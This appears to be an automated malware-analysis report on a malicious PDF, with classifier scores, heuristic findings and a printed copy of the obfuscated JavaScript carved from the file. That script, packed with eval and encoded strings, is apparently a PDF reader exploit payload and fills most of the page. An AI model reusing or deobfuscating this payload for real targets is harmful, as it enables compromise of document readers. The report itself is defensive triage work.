MALICIOUS
116
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
The PDF file was flagged as malicious by an ML classifier with high confidence. Static analysis revealed embedded JavaScript, indicated by PDF_JAVASCRIPT and PDF_JS heuristics. The extracted JavaScript file, 'javascript_obj0007_000.js', is obfuscated and likely responsible for downloading and executing a secondary payload, a common technique for initial access. The presence of String.fromCharCode further suggests obfuscation within the script.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 4
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
,d \){e=function\(c\){return\(c<a?'':e\(parseInt\(c/a\)\)\)+\(\(c=c%a\)>35?String.fromCharCode\(c+29\):c.toString\(36\)\)};if\(!''.replace\(/^/,String\)\){while\(c--\){d[e\(c\)]=k[c]||e\(c\)}k=[function\(e\){return d[e]}];e=function\(\){return'\\\\w+'};c=1};while\(c--\){if\(k[c]\){p=p.replace\(new RegExp\('\\\\b'+e\(c\)+'\\\\b','g'\),k[c]\)}}return p}\('1i 3j\(15\){V W=0;V Z="";3i\(W=0;W<15.3h;W++\){Z=Z+3f.3g\(15.3k\(W\)^1\)}1l Z}1i 1I\(1b\){1l 3o\(1b\)}V 17=3n.3m.3e\(\);17=17.1H\(/\\\\D/g,""\);V 2 … ) -
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0007_000.js |
pdf-javascript-stream | PDF /JS object 7 at offset 0x447 | 7450 bytes |
SHA-256: 923abba11f13c2be3a4ff44a71e22537e4b8b1139d11c7e522e38fcaf0b7f706 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 4 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
function Ev5dvtk5(Y4ca5lsx0){
/* 333 * 12 // 1157605771 */
eval( Y4ca5lsx0 );
}
eval(function(
p
,a
,c
,k
,e
,d
){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1i 3j(15){V W=0;V Z="";3i(W=0;W<15.3h;W++){Z=Z+3f.3g(15.3k(W)^1)}1l Z}1i 1I(1b){1l 3o(1b)}V 17=3n.3m.3e();17=17.1H(/\\D/g,"");V 2Z="$2R$2Q$1y$2P$"+"2N$k$2O$2S$t"+"2T$2Y$2X$2W$10"+"2U$2V$1k$t`3q$3r"+"3K$3J$3I$3G$3H"+"e$3L$3M$1y$3Q"+"$J$3P$3O$3N$"+"k$3F$3E$J$t"+"3w$3v$L`$X$U"+"3u$O$1m$k$3s"+"11$1A$J$N$L"+"`$X$J$1c$1B"+"$10`1E$1D$3t$k$"+"1C$1w$3x$1o$t"+"3y$1n$1q$N$10"+"3D`$1r$K$O$3C"+"3B$1t$k$T`M$3z"+"0$1s$k$2M$19"+"$1u$k$P`$P`$"+"T`M$R$13$k$t"+"3R$L`$2E$K$S"+"23$P`$1p$1v`$T`"+"M$R$13$k$21"+"3$S`1x$J$N$L`"+"$X$J$O$1m$"+"k$1Z$1A$J$t"+"1X$L`$X$J$1e"+"1Y$1B$10`1E$1D$1j"+"H$k$1C$1w$24"+"7$1o$27$1n$1q"+"$N$L`$1r$K$"+"O$19$1t$k$t"+"d`M$R$1s$k$S"+"2j$19$1u$k$1F"+"7`$P`$T`M$R$2i"+"d$k$1W$L`$t`2g"+"$K$O$P`$1p$"+"1v`$T`M$R$13$t"+"2k$1U$S`1x$J$1g"+"1O$1N$S`4d$1M$1K"+"49$k$k$k$1d"+"1$k$k$k$k"+"$1z$1P$1Q$1S$"+"1R$1V$1T$1h$t"+"1L$2h$2L$2l$U"+"2D$1z$2C$2A$2B"+"5$2F$2G$2K$2J"+"1$2I$2H$3S$2z"+"$2y$2q$2p$2o`d$"+"2m$2n$2r$2s$t"+"2x$k$2w$Q$U"+"18$t`1G$14$Q$1F"+"11$1k$2v$2t$2u"+"2$Q$k$3A$3Z"+"$k$1a`e$16$K$"+"t`5e$1a`e$16$K$t"+"5c$t`e`c$14$Q$U"+"18$5a`c$59$5f`e$5g"+"12$Q$k$5i$5h"+"8$51$t`4U$4T$4S"+"$4W$4X$50$5l$"+"4Y$K$1c$5v$t"+"`1G$5x$5w$5y$U"+"5t$N$t`5o$14$1j"+"5p$k$5u$5q$1d"+"1$k$k$k$k"+"$k$k$N$16$"+"K$4q$4p$3W$t"+"4g$40$4K`c$4L$4P"+"4N$4G$4F$4y$4x"+"43$4w$4v$4z$4A"+"b$4E$4D$4C$4B"+"$1h$4m$4O$4M$"+"4H$4I$4J$4u$t"+"4t$46$3Y$3X$3T"+"3U$3V$4h$4i$4r"+"f$4s$4o`$4n$4j"+"4$4k$1e`v$1f$1f"+"$4l$4R$4Q$4Z$"+"5r$5s$5m$5n$t"+"5k$4V$56$5j$1g"+"18"+"";V Y="@u@n@28@55@f@z@z@u@34@y@34@2e@j@a@9@5@41@i@28@30@29@20@3d@3d@20@22@38@22@20@26@26@20@55@f@z@z@u@34@y@34@2e@j@a@9@5@41@i@28@31@29@20@3c@3d@20@22@31@22@20@"+"26@26@20@55@f@z@z@u@34@y@34@2e@j@a@9@5@41@i@28@32@29@20@3c@3d@20@22@32@22@29@I@h@o@4c@37@34@f@p@u@a@33@u@20@3d@20@57@37@a@r@i@z@B@B@28@4d@33@z@z@37@3"+"1@r@m@l@q@28@4a@30@p@9@35@5@a@29@29@3b@h@o@E@9@5@20@53@n@B@q@v@36@F@20@3d@20@57@37@a@r@i@z@B@B@28@22@25@m@30@9@30@22@20@2b@20@22@9@25@m@30@9@22@20"+"@2b@20@22@30@9@22@20@2b@20@22@22@29@3b@h@o@E@9@5@20@4f@w@n@l@m@G@9@C@20@3d@20@32@30@20@2b@20@4c@37@34@f@p@u@a@33@u@2e@x@v@s@r@i@a@3b@h@o@q@a@u@x@"+"v@28@53@n@B@q@v@36@F@2e@x@v@s@r@i@a@20@3c@20@4f@w@n@l@m@G@9@C@29@20@53@n@B@q@v@36@F@20@2b@3d@20@53@n@B@q@v@36@F@3b@h@o@E@9@5@20@47@a@38@l@7"+"0@m@p@20@3d@20@53@n@B@q@v@36@F@2e@y@m@C@y@i@5@u@s@r@28@30@2c@20@4f@w@n@l@m@G@9@C@29@3b@h@o@E@9@5@20@4b@9@f@5@34@5@l@20@3d@20@53@n@B@q@v@36"+"@F@2e@y@m@C@y@i@5@u@s@r@28@30@2c@20@53@n@B@q@v@36@F@2e@x@v@s@r@i@a@20@2d@20@4f@w@n@l@m@G@9@C@29@3b@h@o@q@a@u@x@v@28@4b@9@f@5@34@5@l@2e@"+"x@v@s@r@i@a@20@2b@20@4f@w@n@l@m@G@9@C@20@3c@20@30@G@36@30@30@30@30@29@20@4b@9@f@5@34@5@l@20@3d@20@4b@9@f@5@34@5@l@20@2b@20@4b@9@f@5@34@5@l@20@2b@2"+"0@47@a@38@l@B@m@p@3b@h@o@E@9@5@20@42@r@m@x@A@C@w@u@20@3d@20@s@v@q@20@41@5@5@9@f@28@29@3b@h@o@n@A@5@28@4a@i@5@37@30@r@F@20@3d@20@30@3b@20@4a@i"+"@5@37@30@r@F@20@3c@20@31@32@30@30@3b@20@4a@i@5@37@30@r@F@2b@2b@29@I@42@r@m@x@A@C@w@u@5b@4a@i@5@37@30@r@F@5d@20@3d@20@4b@9@f@5@34@5@l@20@2b@20@4c@37@34@"+"f@p@u@a@33@u@H@h@o@E@9@5@20@42@9@33@q@35@33@j@20@3d@20@22@31@32@22@3b@h@o@n@A@5@20@28@E@9@5@20@54@i@A@l@n@l@3d@30@3b@20@54@i@A@l@n@l@3c@31@38@3"+"b@20@54@i@A@l@n@l@2b@2b@29@I@20@42@9@33@q@35@33@j@20@3d@20@42@9@33@q@35@33@j@2b@22@39@22@3b@H@h@o@n@A@5@20@28@E@9@5@20@54@i@A@l@n@l@3d@30@3b@20@54@i"+"@A@l@n@l@3c@32@37@36@3b@20@54@i@A@l@n@l@2b@2b@29@I@20@42@9@33@q@35@33@j@20@3d@20@42@9@33@q@35@33@j@2b@22@38@22@3b@H@h@20@20@20@20@m@i@u@x@2e@B@5@u@s@"+"i@n@28@22@25@34@35@30@30@30@n@22@2c@20@42@9@33@q@35@33@j@29@3b@h@H@h@v@x@y@v@I@h@20@20@20@20@h@o@E@9@5@20@4a@34@C@31@37@C@31@20@3d@20@s@v@q@20@41@5@7"+"2@9@f@28@29@3b@h@o@n@m@s@j@i@u@A@s@20@48@36@j@34@F@q@A@28@57@p@36@a@f@w@35@2c@20@58@j@5@r@9@p@29@I@h@o@q@a@u@x@v@28@57@p@36@a@f@w@35@2e@x"+"@v@s@r@i@a@20@2a@20@32@20@3c@20@58@j@5@r@9@p@29@I@h@o@57@p@36@a@f@w@35@20@2b@3d@20@57@p@36@a@f@w@35@3b@H@h@o@57@p@36@a@f@w@35@20@3d@20@57@p@36@a@"+"f@w@35@2e@y@m@C@y@i@5@u@s@r@28@30@2c@20@58@j@5@r@9@p@20@2f@20@32@29@3b@h@o@5@v@i@m@5@s@20@57@p@36@a@f@w@35@3b@H@h@o@E@9@5@20@4e@p@l@w@y@3"+"0@20@3d@20@30@G@30@j@30@j@30@j@30@j@3b@h@o@E@9@5@20@4c@z@z@f@l@m@20@3d@20@57@37@a@r@i@z@B@B@28@4d@33@z@z@37@31@r@m@l@q@28@4a@30@p@9@35@5@a@29@29"+"@3b@h@o@E@9@5@20@57@j@q@C@m@j@y@G@20@3d@20@30@G@34@30@30@30@30@30@3b@h@o@E@9@5@20@52@s@34@x@m@p@f@20@3d@20@4c@z@z@f@l@m@2e@x@v@s@r@i@a@20@2a@"+"20@32@3b@h@o@E@9@5@20@58@j@5@r@9@p@20@3d@20@57@j@q@C@m@j@y@G@20@2d@20@28@52@s@34@x@m@p@f@2b@30@G@33@38@29@3b@h@o@E@9@5@20@57@p@36@a@f@w@35@20@3"+"d@20@57@37@a@r@i@z@B@B@28@22@25@m@39@30@39@30@25@m@39@30@39@30@22@29@3b@h@o@57@p@36@a@f@w@35@20@3d@20@48@36@j@34@F@q@A@28@57@p@36@a@f@w@35@2c@20@58@j@5"+"@r@9@p@29@3b@h@o@E@9@5@20@44@39@v@f@a@30@p@20@3d@20@28@4e@p@l@w@y@30@20@2d@20@30@G@34@30@30@30@30@30@29@20@2f@20@57@j@q@C@m@j@y@G@3b@h@o@n@A@5@20@"+"28@E@9@5@20@55@9@s@n@u@f@35@34@q@36@20@3d@20@30@3b@20@55@9@s@n@u@f@35@34@q@36@20@3c@20@44@39@v@f@a@30@p@3b@55@9@s@n@u@f@35@34@q@36@2b@2b@29@I@4a@34@6"+"2@31@37@C@31@5b@55@9@s@n@u@f@35@34@q@36@5d@20@3d@20@57@p@36@a@f@w@35@20@2b@20@4c@z@z@f@l@m@3b@H@h@o@E@9@5@20@49@s@y@F@w@35@a@33@20@3d@20@57@37@a@r"+"@i@z@B@B@28@22@25@m@30@j@30@22@20@2b@20@22@j@25@m@30@j@22@20@2b@20@22@30@j@22@20@2b@20@22@22@29@3b@h@o@q@a@u@x@v@28@49@s@y@F@w@35@a@33@2e@x@v@s@r@i@"+"a@20@3c@20@34@34@39@35@32@29@20@49@s@y@F@w@35@a@33@20@2b@3d@20@49@s@y@F@w@35@a@33@3b@h@o@i@a@u@y@2e@j@A@x@x@9@C@53@i@A@5@v@20@3d@20@43@A@x@x@9@6"+"2@2e@j@A@x@x@v@j@i@45@1J@9@u@x@49@s@n@A@28@I@y@m@C@p@3a@20@22@22@2c@1J@y@r@3a@20@49@s@y@F@w@35@a@33@H@29@3b@h@H"+"";Y=Y.1H(/@/g,"%3p");3l(1I(Y));',62,345,'|||||72||||61|68|||||79||0a|74|63|t1111|64|75|66|09|6a|77|67|6e||69|65|6b|6c|73|71|6f|70|62||76|7a|78|7d|7b|t1110|t1113|t90d|98|t9811|t4311|t117|t130c|tb390|t4|td|t1|var|Eql9cdyr|t4db3|Iugqvi3j|Nttfvz|t9|||t104d|t9412|Rhyxlbeu|t0c94|Uyqqi4s4|111|t84gg|t12|Gxo547|t2011|t111|t2|t2129|t8|t707g|function|t13|t619c|return|t9179|tb7dd|t230b|te1gg|t2315|t54b3|t1341|t1043|t1047|t147|t6511|84|t4647|t7456|t5d84|t10g7|tgc91|t248b|b3|t11|e77|replace|W7hgtqpp|6d|tb2|5b75|t4c48|t4g4e|e11|t4565|t7e74|t6570|t4161|t5b11|tgg43|t5079|t9843|9811|011|tgg11||tgg4||311|t991|||tdc57|||||||||7b3|t7378|t104|143|1111|t6863|t38ge|t98g6|t64|tb121|tg698|t20g8|tcdb1|t0bb7|tc41|t9269|tc412|112b|tg398|tcc11|t7g63|t50|t4165|150|t69b3|t7575|t7463|t6954|t7d78|t461|t6262|t7063|t4143|t11d9|t4e11|t8b44|t4340|t4241|tde92|201e|c1b|t1b51|t6921|t5112|t75b1|J0ja5rh|||||||||||||||toString|String|fromCharCode|length|for|M3qq71gudw|charCodeAt|Ev5dvtk5|viewerVersion|app|unescape|u00|e0b|t51|tgg|t1372|110|t984d|4g11|t9917|dc57|tb39|tce9e|gg|t84|0d|te7d9|tdg10|t2551|t519|t9c18|tdc19|9c|t9c6b|t2b51|t105d|tcgdd|t1011|t4dcd|9843|t7274|t6|270|t3d79|tgg49|t6372|t1174|t130g|t4d4g||||||t6974||||||||||gggg|t7961|t1161|t7b2|t703d|t663g|t4575|t703g|t3g2|td946|t4711|t65|t6165|3d75|t6164|t3d5d|t5g5e|t5b|t44b2|t5b55|t115|t7b7d|t667g|t555b|t4344|tdedc|t1365|t5074|t6111|t7775|t10|t91bd|t7b78|c2d|t577g|tc|t7g72|t7b74|t4d15|t6548|7g2|t7479|tdc52|t4dd8|t3694|t747e|te082|tgb40|||||t7b7b|||tec20|t4d||4111||c11|t47|t94|te69|tb798|t257g|3724|t12d1|t782g|t2e75|eb7|0c|t1101|t613d|t6179|113|tdcb2|t87g7|t1213|td1b0|t0g94'.split('|'),0,{}))
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.